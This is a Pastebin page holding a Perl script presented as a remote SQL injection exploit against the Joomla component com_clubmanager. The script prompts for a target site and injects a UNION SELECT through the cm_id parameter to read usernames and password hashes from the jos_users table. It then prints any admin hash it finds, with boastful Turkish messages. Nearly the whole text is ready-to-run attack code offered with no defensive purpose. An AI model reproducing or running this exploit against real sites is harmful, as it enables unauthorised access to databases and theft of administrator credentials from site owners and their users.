Advertisement
X-GhosT_MadaRA

Joomla Component com_clubmanager Exploit

Sep 19th, 2014
361
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.48 KB | None | 0 0
  1. ========================================
  2. Joomla Component com_clubmanager Exploit
  3. ========================================
  4.  
  5. #!/usr/bin/perl -w
  6.  
  7. ########################################
  8. #[~] Author : Fl0riX
  9. #[!] Script Name: Joomla com_clubmanager
  10. ########################################
  11. print "\t\t                                                              \n\n";
  12. print "\t\t        Fl0rix | Bug Researchers                              \n\n";
  13. print "\t\t                                                              \n\n";
  14. print "\t\t Joomla com_clubmanager Remote SQL Injection Exploit   \n\n";
  15. use LWP::UserAgent;
  16. print "\nSite ismi Target page:[http://wwww.site.com/path/]: ";
  17. chomp(my $target=<STDIN>);
  18. $florix="concat(username,0x3a,password)";
  19. $sakkure="jos_users";
  20. $com="com_clubmanager";
  21. $cw="+UNION+SELECT+";
  22. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
  23. $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
  24. $host = $target . "/index.php?option=".$com."&tabla=equip&task=presenta&cm_id=284".$cw."1,".$florix.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
  25. $res = $b->request(HTTP::Request->new(GET=>$host));
  26. $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
  27. print "\n[+] Admin Hash : $1\n\n";
  28. print "# Baba Buyuksun bea Bu is bu kadar xD #\n\n";
  29. }
  30. else{print "\n[-] Malesef Olmadi Aga bir dahaki sefere\n";
  31.  
  32.  
  33.  
  34.  
  35. # 85A0C4EFF5C190DE   1337day.com [2014-09-20]   F511082E2C4E41F6 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement